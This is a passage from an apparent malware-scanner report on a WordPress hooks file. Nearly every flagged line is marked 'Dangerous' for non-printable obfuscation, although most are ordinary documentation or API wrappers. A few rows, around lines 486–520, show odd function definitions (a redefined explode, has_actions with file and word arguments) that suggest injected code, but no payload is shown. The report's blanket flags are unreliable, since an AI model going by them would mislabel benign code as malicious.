</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 442</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that have been added to an action hook</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">invokes all functions attached to action hook </span><span style="color: #007700">`</span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">`.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 457</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">example_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$arg1</span><span style="color: #007700">, </span><span style="color: #0000BB">$arg2 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions hooked to the action</span><span style="color: #007700">. Default empty.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 486</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'explode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$array</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 488</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">split</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$array</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 492</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">apply_filters_ref_arrays</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$word</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, and </span><span style="color: #0000BB">methods</span><span style="color: #007700">. </span><span style="color: #0000BB">The functions </span><span style="color: #007700">or </span><span style="color: #0000BB">methods will</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 501</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$count</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 504</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has_actions</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$word</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 520</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">apply_filter_ref</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 552</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">do_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, ...</span><span style="color: #0000BB">$arg </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to a filter hook</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that have been added to an action hook</span><span style="color: #007700">, </span><span style="color: #0000BB">specifying arguments in an </span><span style="color: #007700">array.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 607</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">do_action_ref_array</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 648</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is an alias of has_filter</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 658</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 659</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">has_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returning a </span><span style="color: #007700">new </span><span style="color: #0000BB">value</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 663</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">from an action hook</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 665</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions attached to a specific action</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which should be removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is bound to a filter hook</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 680</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the </span><span style="color: #007700">function </span><span style="color: #0000BB">is removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 683</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">remove_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 687</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions from an action hook</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 696</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_all_actions</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 697</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">remove_all_filters</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 69</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned</span><span style="color: #007700">:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 705</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Hook name of the current action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 707</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">current_action</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 708</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">current_filter</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 712</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns whether </span><span style="color: #007700">or </span><span style="color: #0000BB">not an action hook is currently being processed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 714</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">current_action</span><span style="color: #007700">() </span><span style="color: #0000BB">only returns the most recent action being executed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 715</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns the number of times an action has been fired during</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 718</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">allows detection </span><span style="color: #007700">for </span><span style="color: #0000BB">any action currently being executed</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">example_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$example </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 729</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the action is currently in the stack</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doing_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 732</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">doing_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 73</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$example</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 743</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int The number of times the action hook has been fired</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 745</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">did_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 752</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$wp_actions</span><span style="color: #007700">[ </span><span style="color: #0000BB">$hook_name </span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 756</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions attached to a deprecated filter hook</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wpdocs_filter'</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">, </span><span style="color: #0000BB">$extra_arg </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 769</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters_deprecated</span><span style="color: #007700">( </span><span style="color: #DD0000">'wpdocs_filter'</span><span style="color: #007700">, array( </span><span style="color: #0000BB">$value</span><span style="color: #007700">, </span><span style="color: #0000BB">$extra_arg </span><span style="color: #007700">), </span><span style="color: #DD0000">'4.9.0'</span><span style="color: #007700">, </span><span style="color: #DD0000">'wpdocs_new_filter' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">arguments to be passed to apply_filters</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 782</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">apply_filters_deprecated</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$args</span><span style="color: #007700">, </span><span style="color: #0000BB">$version</span><span style="color: #007700">, </span><span style="color: #0000BB">$replacement </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters_ref_array</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 793</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions attached to a deprecated action hook</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">but can be methods of classes</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">arguments to be passed to do_action</span><span style="color: #007700">().</span>
</span>
